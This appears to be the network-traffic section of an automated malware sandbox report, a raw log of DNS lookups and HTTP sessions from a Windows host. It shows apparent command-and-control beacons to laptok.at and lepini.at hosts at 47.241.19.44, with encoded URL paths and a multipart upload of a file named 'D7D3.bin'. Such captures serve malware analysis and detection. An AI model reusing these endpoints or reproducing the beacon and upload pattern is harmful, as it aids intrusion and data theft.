Nov 23, 2020 16:12:57.751199007 CET	59420	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:57.786647081 CET	53	59420	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:59.411863089 CET	58784	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:59.438926935 CET	53	58784	8.8.8.8	192.168.2.3
Nov 23, 2020 16:13:01.570142031 CET	63978	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:13:01.605704069 CET	53	63978	8.8.8.8	192.168.2.3
Nov 23, 2020 16:13:16.207571030 CET	62938	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:13:16.711636066 CET	53	62938	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:00.866348028 CET	55708	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:00.906467915 CET	53	55708	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:01.258485079 CET	56803	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:01.299052954 CET	53	56803	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:01.660799026 CET	57145	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:01.696690083 CET	53	57145	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:02.034075022 CET	55359	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:02.069792986 CET	53	55359	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:02.343816042 CET	58306	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:02.379681110 CET	53	58306	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:02.665940046 CET	64124	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:02.701630116 CET	53	64124	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:03.275583982 CET	49361	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:03.372704029 CET	53	49361	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:03.754538059 CET	63150	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:03.792294025 CET	53	63150	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:04.222193956 CET	53279	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:04.262195110 CET	53	53279	8.8.8.8	192.168.2.3
Nov 23, 2020 16:14:04.500405073 CET	56881	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:14:04.535871029 CET	53	56881	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 23, 2020 16:11:47.160159111 CET	192.168.2.3	8.8.8.8	0x48ea	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 23, 2020 16:11:52.523591042 CET	192.168.2.3	8.8.8.8	0xfdcf	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 23, 2020 16:11:57.958570004 CET	192.168.2.3	8.8.8.8	0xbf03	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:52.072391987 CET	192.168.2.3	8.8.8.8	0x1d2b	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:53.216067076 CET	192.168.2.3	8.8.8.8	0x43d5	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:54.805691957 CET	192.168.2.3	8.8.8.8	0xc51a	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:56.405498028 CET	192.168.2.3	8.8.8.8	0xf87d	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:57.751199007 CET	192.168.2.3	8.8.8.8	0x6f2f	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Nov 23, 2020 16:13:01.570142031 CET	192.168.2.3	8.8.8.8	0x50e3	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Nov 23, 2020 16:13:16.207571030 CET	192.168.2.3	8.8.8.8	0xb94c	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Nov 23, 2020 16:11:47.196433067 CET	8.8.8.8	192.168.2.3	0x48ea	No error (0)	api10.laptok.at	47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 16:11:52.561302900 CET	8.8.8.8	192.168.2.3	0xfdcf	No error (0)	api10.laptok.at	47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 16:11:57.996260881 CET	8.8.8.8	192.168.2.3	0xbf03	No error (0)	api10.laptok.at	47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:52.450663090 CET	8.8.8.8	192.168.2.3	0x1d2b	No error (0)	c56.lepini.at	47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:53.243102074 CET	8.8.8.8	192.168.2.3	0x43d5	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:54.841114998 CET	8.8.8.8	192.168.2.3	0xc51a	No error (0)	api3.lepini.at	47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:56.432591915 CET	8.8.8.8	192.168.2.3	0xf87d	No error (0)	api3.lepini.at	47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 16:12:57.786647081 CET	8.8.8.8	192.168.2.3	0x6f2f	No error (0)	api3.lepini.at	47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 16:13:01.605704069 CET	8.8.8.8	192.168.2.3	0x50e3	No error (0)	api3.lepini.at	47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 16:13:16.711636066 CET	8.8.8.8	192.168.2.3	0xb94c	No error (0)	api3.lepini.at	47.241.19.44	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49724	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:11:47.478786945 CET	204	OUT	GET /api1/zQt8WvwqX1ucd4e_/2BSjEwnwCh3l6nl/uRpMWVq6Na7DVvVqDQ/c_2F8RJYX/bwf8F3MzlXzQXVHyRWwx/arvl4jzmt4MjkOLeA5D/hFQALRzK_2FfnX1J_2B_2B/QVhfzXC95MQT_/2F5JxPkR/0hfcwScbYsxo4WDetMu7ETB/kC0bi1gC1M/Peufr7Q9aEqhXzY9P/IP_2BoMUFEki/3WBXS7Ps9gU/B0guoxmZ0c7HMP/MN7IPcCq62eYfghVtkrOj/cDqHZNRKwjs9dSDB/S_2B_0A_0DCG5Ou/hoVuqtcbmguh8Hg01X/wBH_2FHER/Tq885DE0KGS3yQbLseza/xevKBRy_2Beq5lp/lACGR HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 16:11:48.498064041 CET	205	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 15:11:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 b6 ab 40 14 45 07 44 03 b7 26 ee 16 9c 1e ee ee 8c fe bf df 4e 56 a0 e0 d6 39 7b 07 d6 4d d3 03 32 8f 68 51 ec dd a4 d5 03 89 87 98 b3 1b 6f df 85 86 fd db eb df a1 f7 6a 94 f1 93 f1 24 42 e6 e4 ba 60 24 36 cd 08 66 90 b5 f8 01 db 84 68 d0 be 9b e6 09 88 b2 86 93 f4 32 4b 37 33 5f ca 10 25 01 be f3 e9 47 28 85 60 d1 37 d8 75 32 c1 f0 c3 41 9d ea d2 61 a7 10 06 b3 77 01 c0 b6 b8 02 88 ed 08 82 11 8c fb 07 e9 3b d2 c2 84 c7 c3 e3 1f 76 bf a6 fd 90 0a b6 6d e8 c8 64 9e c8 77 d9 70 c6 a6 a5 76 32 a2 43 9d ab bf cb 20 8f 02 8c 16 86 1a 4e 0d 82 da 54 1b 01 b0 1d 40 16 35 31 40 8d 6d 9a 21 ed 7c 0f 93 79 4d 1a cb 88 00 9a 60 86 10 4f a6 36 81 13 1d f0 f1 2d 16 9d c2 ad cb b3 26 3b 9c 31 fe f4 af 33 e2 14 50 07 27 0c f2 b9 d3 d8 50 9d 6f 34 b6 d0 b1 c1 f6 03 25 8e d2 18 cf 95 e4 78 13 e2 5c c0 ff 06 8b bb 6f 49 67 ec de cc 55 dc 9d c1 f3 77 99 48 46 82 3a 23 bb 09 69 7e 94 fc 0e e4 aa 9b 3b 2b ce 2c ca 3c 2f 1f 4a ad 89 e2 a2 7b 31 7e 33 b4 9a 74 b6 a1 0c d5 80 bf 22 62 dc 7b fd 96 75 2f 73 e3 90 24 0d 64 37 42 e6 fe b8 a6 4a 3b 7a e4 22 01 b3 ab 5b 79 65 a2 64 47 de a3 09 b8 4e a1 02 fe 9b 49 fc 37 de d4 8a 19 f8 1d 20 63 24 6c 39 35 fd 80 b6 24 e6 d0 40 58 fc 07 27 f1 d4 68 0e 9b 4f 5d b1 10 f8 8c 33 0d a9 8d 41 1c da ca af 5a 8c 38 0c d4 3c ad fa d1 a5 72 23 3d 16 cb b8 17 7c 3f 5d 8c fb d9 73 62 8a fe 24 10 c3 f6 e8 04 6c e2 05 ab 77 c4 ef 14 9e 05 0f 80 74 5f 27 81 64 70 67 64 c0 09 a6 74 e9 ea 88 b5 7b 34 bb 16 08 bc 2d e8 ed e9 b5 3a 4b f1 0a c7 e2 18 1c 62 be 51 6c 62 d2 ab 78 c5 9f 00 23 a8 33 60 cb 89 de be c5 8f 4a fe 42 fd 91 40 73 b8 08 d4 da af bd 5f 47 b2 da dc 9d 6a c7 18 db e8 33 29 de ef 02 77 c3 37 99 31 8b 27 3e a1 99 e7 cc 85 ef c5 69 9e 04 80 de af 4b cd f2 18 af 66 6d 51 b5 d2 96 39 84 c9 94 3c 69 10 ac 4b cd 4d bb 73 eb 95 9b 30 a1 39 11 9c f4 df 30 42 95 98 81 19 ed fe a0 2c 07 31 c5 e7 43 3b e0 27 4b e0 3a e2 2d a2 e5 64 74 72 23 32 58 d9 d2 89 29 a6 43 3e 01 78 f1 5b 64 5b 24 3f a4 dd f6 47 68 f9 0d e5 07 be 56 de cb 9d 20 8c ba 1f 66 01 2c ac d2 19 87 45 d3 66 b9 a0 3d d1 c5 ac 10 a6 63 90 6a 71 2e b6 5b 39 c7 3a c3 3e 22 2a 73 df 42 ef 89 10 93 15 a3 0b e6 3a 4c f4 c9 40 a3 df 04 cd 79 86 8c 6a ca ef 78 0e 1a 61 67 30 02 e6 fe b0 f1 de 9a 37 9d 0c 6e e3 f8 56 7a c3 b3 31 46 d5 1f 7d ca bc 38 0d bd 21 b2 d3 8b 00 a1 37 bd 5b c1 25 ce 84 8e 18 ce fb 0e 8b 8f 9e 64 1c 3a 5c 51 31 50 ec e3 8c b7 47 4c 6b f2 c2 87 f0 c9 c3 01 fa 9b 6d da 4c 9e ea b2 07 c0 6a 26 83 59 47 a3 0a d9 ca 22 db c6 91 8d ca 17 e3 e3 ac 41 a0 a7 0d 53 13 f7 8c 41 8d 55 89 b6 d9 ee 04 e8 55 9f c8 81 69 5c 1a 08 55 6b 04 f0 53 dc f5 f8 f1 29 73 b9 46 e0 fd 25 c5 77 3e e7 10 06 b1 f4 15 10 e2 27 83 3b 43 6b fd 4c ea b9 7b fa 97 50 9e ae 51 ef 97 15 36 5f 4a ea 06 f2 b2 3a b0 e8 f3 8b 53 b9 fc 95 30 70 7a 94 f5 cb 72 e4 c8 fd 74 2e a1 c0 ca 19 06 a0 d5 2b ab 5b cc 46 71 db 0b b7 ae ed 4b 76 21 92 44 c0 ad b9 bd c7 01 ba f1 c5 50 80 a2 48 31 55 bc af 15 20 e1 e4 34 64 86 9a 55 69 89 33 5c 15 8c 2e 34 b8 91 17 5b 19 e2 d2 d5 e2 e0 49 fd 9b 80 18 94 8c e4 a8 85 82 16 70 88 ac 74 37 f2 05 6b 81 00 71 0f 7e ac 8a Data Ascii: 2000E@ED&NV9{M2hQoj$B`$6fh2K73_%G(`7u2Aaw;vmdwpv2C NT@51@m!\|yM`O6-&;13P'Po4%x\oIgUwHF:#i~;+,</J{1~3t"b{u/s$d7BJ;z"[yedGNI7 c$l95$@X'hO]3AZ8<r#=\|?]sb$lwt_'dpgdt{4-:KbQlbx#3`JB@s_Gj3)w71'>iKfmQ9<iKMs090B,1C;'K:-dtr#2X)C>x[d[$?GhV f,Ef=cjq.[9:>"*sB:L@yjxag07nVz1F}8!7[%d:\Q1PGLkmLj&YG"ASAUUi\UkS)sF%w>';CkL{PQ6_J:S0pzrt.+[FqKv!DPH1U 4dUi3\.4[Ipt7kq~
Nov 23, 2020 16:11:48.498085022 CET	207	IN	Data Raw: 1a 7f 77 03 d0 a3 78 5c 64 bb f9 d9 d4 3b b6 c6 ee b1 5c 81 d5 c0 eb 80 92 7b e5 d5 94 a7 5c 4a 02 c5 00 2f 7a f0 53 96 d1 86 62 29 a5 50 f2 75 68 09 8f 74 f6 24 12 86 9c 3d 10 1f a8 b8 68 03 0b 7f be c8 b5 81 cf 38 ab 2e 60 31 9e 6a 67 df c2 79 Data Ascii: wx\d;\{\J/zSb)Puht$=h8.`1jgy&f-fsD;2^Wj15N4oa4YTd{p2MV.W\y9k3#0e8D/PVQ0iG{Y}r7NV]yGE7_
Nov 23, 2020 16:11:48.498096943 CET	208	IN	Data Raw: 15 2d bd 92 3a a6 44 67 09 40 6d ad 5b 8a 82 b9 d1 b2 af 34 1f fb c7 84 3f c5 80 fa 3c a4 f7 53 50 20 9f 08 dd b6 c3 ac 04 13 64 0e ca 80 89 dd 3f c1 1e 8b 00 62 0e 12 68 ef e1 bd 9b e7 97 aa cd e9 d3 2f bc ca ef 32 ab f1 74 f4 ab 3d f0 68 1b ce Data Ascii: -:Dg@m[4?<SP d?bh/2t=hYOk+AD~IOCKD~=IxECW`\|iAa7E5q_C\p03_=i@N%;/0~j-r*#Nn%l-d7
Nov 23, 2020 16:11:48.498110056 CET	209	IN	Data Raw: d1 c7 02 d7 94 02 e9 47 1d 59 16 04 52 0f a7 a2 e9 cd e8 a5 b9 5c 51 ac b3 aa 02 ef d7 6f 57 01 03 ec 61 ed 0d 22 80 7f c1 65 91 cf 25 2d 72 ef 7b 39 3e 62 77 01 13 43 44 5b 31 95 40 69 9e 3f 79 76 6e 7f 04 13 56 30 c8 bf a9 f4 3f 3e 9d ba 69 cc Data Ascii: GYR\QoWa"e%-r{9>bwCD[1@i?yvnV0?>i_w#aU9Vym>;p2Lq:[gz{?x}v`^OjiJx8C\|6Z)wAA8E'x]41?m!hQK4-~Z
Nov 23, 2020 16:11:48.498131990 CET	211	IN	Data Raw: 1a a0 bf 81 4e f3 43 2c 90 f6 0f 0b 61 3a f3 67 17 51 d4 13 4d 63 b6 ee ef fd 26 af 07 02 11 3c 47 77 a1 e6 f1 9a d3 50 f2 ab 6a 03 95 72 26 9d ab 49 54 67 16 9f 78 c1 29 9d ec 2c fe 30 bf ed d4 30 af f6 1e 06 50 09 78 83 b8 ea b3 2f c6 76 72 cb Data Ascii: NC,a:gQMc&<GwPjr&ITgx),00Px/vrAH9EJ>D2zjybUrX.7Zp?'/>2r6}/wdN:pHwReTo2-7Ly"cfU3eJO6!y.oFlnMwbI]
Nov 23, 2020 16:11:48.498152971 CET	212	IN	Data Raw: 16 bd 82 bd 31 fb 4c 05 9b ab b4 0d fe d3 91 6c 21 d9 52 44 60 08 66 69 3d 6a 98 71 f8 f0 cd 7b ea 23 a6 46 d5 61 0a d2 81 9e 88 7f d8 4f ff 63 10 1e ac 46 c0 6d a9 0f 3b 96 b7 ac c7 1c 88 39 6e 72 7a 1d 77 76 8a 0a 57 00 7c 7e 0c 35 72 80 85 f1 Data Ascii: 1Ll!RD`fi=jq{#FaOcFm;9nrzwvW\|~5r:C1sK/d3>ix!fIQ%xj6Ug_8\|S&X.W&9M5I)ld$eZMCtNF35Nm "dNijBy\{8EznbMx-z'
Nov 23, 2020 16:11:48.541169882 CET	214	IN	Data Raw: 15 68 2f b1 d0 cb 7b 53 76 80 fa 4f 85 b8 e3 77 3f c1 0d b1 37 bb b1 40 70 01 a5 7a 56 9f 4d 53 36 b4 d9 11 8d 70 1e 29 eb 02 82 29 bb 3a 7c 05 fe 96 bc b3 1d 05 67 37 9d df 18 b1 9d 00 f2 91 76 8f 93 07 47 b8 74 24 4b 67 4d 41 37 80 fb 83 db c3 Data Ascii: h/{SvOw?7@pzVMS6p)):\|g7vGt$KgMA7z0Byb\?bujZ~s<tZc[VL2#Ov?0/,#!'P]:qnJ(0{vi^8M<W$>i\{uJwcW2d;Y@}~dp
Nov 23, 2020 16:11:48.541198015 CET	215	IN	Data Raw: 64 77 94 50 f8 ff f8 f5 0d 73 28 8c c9 b7 15 0d 5c 96 f8 a1 c6 8a 40 6e 91 15 b7 2b a7 53 65 00 a9 62 36 45 06 75 92 44 90 0f e8 4f 8e e7 4b 87 7c 3b 9b 67 4b 73 66 3f f6 83 8a 02 77 f3 47 7b 0f df b2 83 c5 76 2f f0 8b 36 e3 21 ab b7 9e 57 44 d4 Data Ascii: dwPs(\@n+Seb6EuDOK\|;gKsf?wG{v/6!WDlb{8,yRu]Ig:uN}4fS9KP^?_7fa}Cz8X\N69}ey30VBH~<Mm&Ir.z"6aY^g6\|F3N5+I}l3
Nov 23, 2020 16:11:48.541218042 CET	216	IN	Data Raw: 35 da ae fe cb 63 3e 80 6c 10 3a 97 04 41 4c f9 17 7b 8c c8 c2 d7 10 fe e1 2b 73 1d 76 e2 2e ad 28 56 a5 57 2a 8f 61 92 41 b2 de 7e a0 6a f5 e5 5f 66 11 89 45 38 44 e8 a4 24 60 84 e8 36 09 2d 75 f5 35 bf 95 39 a5 33 a3 0d f2 be ca c2 50 97 d1 0f Data Ascii: 5c>l:AL{+sv.(VW*aA~j_fE8D$`6-u593PbpA(GwW<ZTD%bk-V?+D,xg{>]!o]5<fjvET%Q"\|aF]ff2#Ixi[ifuiLt&f_
Nov 23, 2020 16:11:48.541237116 CET	218	IN	Data Raw: f1 af 49 4b f6 f5 40 74 2d 77 84 fc e3 a4 24 ae ca bf 3b eb 18 d9 71 fa 7f 52 41 f4 65 34 95 bb 9b df 10 a0 5b 4d 36 2f 7f 45 07 df bf bf 39 80 7b fd 13 dd ec 51 83 33 ac b4 3f 01 9f a2 7d 09 1b 24 44 9e 60 57 58 6c 0c 8d fa 54 7d 84 b2 57 a8 49 Data Ascii: IK@t-w$;qRAe4[M6/E9{Q3?}$D`WXlT}WI?~#T_=i4LI/kBsn J;y74/}O(Y)I0djQ"8]jhvhgb7[Szi7c#TFHZd{9+,dG5(SS
Nov 23, 2020 16:11:48.762972116 CET	219	IN	Data Raw: 04 7d 25 d5 e0 00 73 df 1b b4 62 fb cb 25 62 e1 c7 fe b2 76 9d e0 d3 03 44 0a fc b2 2c a4 ca ac 57 46 d7 70 35 e1 27 82 4e 54 49 fd 4a 25 77 f1 ee 41 6a b5 f5 da 09 8e a5 dd 27 90 41 3e 8e 27 44 40 a6 99 d6 d2 a3 76 eb 52 31 3f ee da 4f 7d e8 d7 Data Ascii: }%sb%bvD,WFp5'NTIJ%wAj'A>'D@vR1?O}[)j\'WwHCA$L2/b?VO7T_YiY8F=Wf^'YAy$<T'$s-:qE -Bx

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49723	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:11:50.317298889 CET	417	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 16:11:51.104326010 CET	418	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 23 Nov 2020 15:11:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49753	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:13:16.973409891 CET	6182	OUT	POST /api1/5duQ24WkEJhfNKcQ0TtbT/y1o1_2BxaM4VRnTU/wdvTVxLytK1l1bT/fJXL5suBfQkXS4oUUP/mmESlomdV/cfAQ_2FYWeSWD8ACwTHr/QfRIv77y7phDpPLLIms/S59WqtiRNXjaQ0pzSKlmJM/kxGDlqzCuosq1/f_2BZ3Pr/E3vAfyZQfaDksG_2BDrkzEp/UgnLfSwrLz/kgRJpiRCAy1CBQ5sn/tydBJN8MmXH2/KVLFrApCWoX/0lYuVaHp_2BxqQ/jyBfF8kw0TJiDC_0A_0Du/OUYUhVxClC_2FD_2/Fz_2FQM096C4yzs/twUSnuO6_2BuV4B88j/Vk2oB HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=169697152142641157212597995774 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Content-Length: 563 Host: api3.lepini.at
Nov 23, 2020 16:13:16.973515987 CET	6182	OUT	Data Raw: 2d 2d 31 36 39 36 39 37 31 35 32 31 34 32 36 34 31 31 35 37 32 31 32 35 39 37 39 39 35 37 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c Data Ascii: --169697152142641157212597995774Content-Disposition: form-data; name="upload_file"; filename="D7D3.bin"qj-mCdBko!\|$"rBFRap}Sa}szh&4Ion!R)fr((&CNDQd_#\.o=a>$(2,l
Nov 23, 2020 16:13:17.903021097 CET	6183	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 15:13:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49726	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:11:52.845490932 CET	432	OUT	GET /api1/ZndIxL1Rb/5wthxjo8h6XlGXwhQjpI/qR4_2Bxy4qmCmpod_2F/aR_2Bq10kCEEmmsKL463nm/IwJnUBwMFW3IE/IWX2kgn2/AlRW6_2FwG8heSg8_2F45kx/d4CTG40DuC/sB_2BD_2BsM3jQ0t4/hyjobYI0rasE/sXzcAxdFd67/YKNQnrZrruVtZL/y9fsMRIhJ_2BBspvP_2FO/RHYAogT86Q7GBO8a/8pyYO5iimp3k3ij/LQMLc4JwFGySVUyYlf/Y3_2Fdd4T/rv7G_2ByjMoeYiU5c_0A/_0D1PNgf8iqzwUhfRFh/19iAB9EdF6LCz3fArW2WPs/VDtJz46818gnQ/eDClUEW1AGzlbdI/6d HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 16:11:53.885571957 CET	434	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 15:11:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b b5 96 a4 50 14 45 3f 88 00 b7 10 77 77 32 a4 70 a7 d1 af 1f 26 ac a4 16 bc 77 ef 39 7b 57 af 6e aa e0 5e 15 05 0f 8a 75 43 3a 4a 82 16 6f f7 83 c3 1d ef 42 1c e7 b8 d0 c7 ce 65 a5 8e cd 1c a7 6b f9 86 21 c7 63 3c f9 fa c7 83 d0 df 5c 75 2f 10 51 22 f7 f3 8b ba 9e 56 64 91 10 10 29 cd ba 55 93 41 8d 20 97 3b 68 ea bc 28 be db eb 73 1c e8 36 a9 a9 35 63 4e d9 53 b9 d4 f2 7c ab 0a 22 21 bf 67 c0 5c 2c 37 b8 14 e5 9d 1e fe ef ad d3 e2 9a fb 24 7d f5 16 c6 65 c7 aa 3a 00 e6 53 15 75 e1 54 1c 6d e7 f4 1c 2c 07 80 4a a0 d8 d3 6e 5a 1f f8 83 99 4b 92 3a 3c 8b 7f 69 67 73 7f ef fc 07 a2 a8 0d 94 03 5d 1e e7 46 af 3d 4c 9c 71 19 2d be 45 8b ac aa 45 8d 26 4e 23 4d 37 ce df df 0f 07 19 20 8a 1f 59 a9 89 5e 46 2a d7 8e fa 85 61 7e 4c 77 13 92 5f 6f e5 fa a8 f8 5f 46 29 90 ff fb 6d 54 62 2f 88 aa bf cc 0b 73 ac df bb 1c d9 21 b9 2b 60 0b 6f 2c e6 32 91 aa c5 30 5c 20 81 44 99 b6 78 b2 ff c1 46 44 f1 15 eb 89 44 b8 05 fe cc 53 a9 3b 23 b8 ac cf 9b 37 4e c9 b4 8a c2 9f e5 be ce 86 60 47 e9 76 1b 71 9a 9b 20 f0 77 73 c2 99 16 f2 15 f5 54 83 97 92 10 35 c9 c9 fa f4 85 fc 5b 49 82 0d a9 c7 e6 c5 c5 88 4b de db a9 b2 e8 b1 ac 6a 31 0a bc 05 d4 76 83 54 cf 37 23 e0 b0 2b 9b 71 f8 02 5a 76 43 b6 7d fe a5 54 0f d5 80 bd f4 6a 87 3d 17 55 40 5e 05 4d a8 8f b0 a8 7c 7a a7 28 68 9a 22 31 72 0e 2d 02 b6 59 2a 43 94 96 0b 15 07 6f 5d aa d8 2b 7b 61 ea 24 c3 6b 80 d5 95 b5 b8 dc cc 04 e3 64 40 02 0a c3 d2 fa f4 ac bb 4d 80 a3 c9 0b 71 eb fd 26 d4 14 ad 4b 9c c4 80 68 aa 1f 07 48 18 c5 56 da b4 82 eb 79 9c 8e 92 02 90 0d d8 37 80 38 55 c2 64 26 16 1b a5 24 61 92 97 87 70 53 d4 c5 96 0c a3 da 4e 17 77 5c db 43 4e eb 65 a9 aa 6f 58 44 26 21 59 af c9 f7 68 ad 81 ce d3 35 d4 79 c5 8d 46 ad 85 f8 a0 72 a0 86 fa 5a b6 9b f4 86 fb d3 1c df f1 f0 17 47 e6 2e 0e 73 ea 14 9a dd 89 b6 d5 86 20 26 09 de 97 b2 9a 11 45 1b 05 15 8f 1d e0 44 aa cf eb 45 f7 42 4c 93 f5 d1 dc 2e e9 36 52 c9 f0 c9 9c 58 a8 67 4c 22 96 4a e9 79 aa 3c 54 6d 82 6b d2 7a d7 cc f0 23 63 8b e5 07 2e bf 01 8f 4d 1c 2f 29 dc a8 27 e7 06 15 35 e6 fe 3a 1c ac f3 98 d0 bb f2 11 b2 94 97 e2 3a 83 95 81 64 56 90 44 2d 88 e1 ef 76 43 cb 30 3e ca e1 d9 8a 81 0a f9 88 95 f6 66 ec 8c 5b af e8 9a 64 97 46 62 69 f5 24 36 f2 6c 01 56 e7 7f 4a a6 62 68 cb 19 c7 2e e2 51 25 fc 6a 6e fc 5b e2 8c 7a 08 25 0c 0e c7 c7 cb 40 1b a2 09 83 ea ab ca 7e 9d f0 64 99 4d 66 09 51 b6 22 04 42 04 c2 e7 bd a5 9f c8 7d ce 65 24 2a bd e7 8a d8 7a 3c c3 b9 9d b7 3b 45 98 7b 33 6f c8 82 d2 70 ef c0 f9 17 96 df 46 9a 2c d4 8e cb 0b 4c 30 7c 2e 33 9e 1e 40 16 e9 2b 32 d3 06 84 e9 7b 12 56 3c 87 fe 15 6f e8 08 3b db 35 bd af 4a 48 8d e8 5a 62 c0 a6 6c 94 ed e0 7c fb 81 51 92 74 ff ae 66 07 6a 01 d4 19 43 19 c1 60 5f 19 95 39 8c 03 2d 35 9f e6 7e 6e 9f be 16 4a 4f 78 54 66 2b 31 e0 44 a3 cb 82 49 46 a4 22 11 ae 0c a2 88 8f 4d 67 f0 d7 4f 9c 90 3b bb 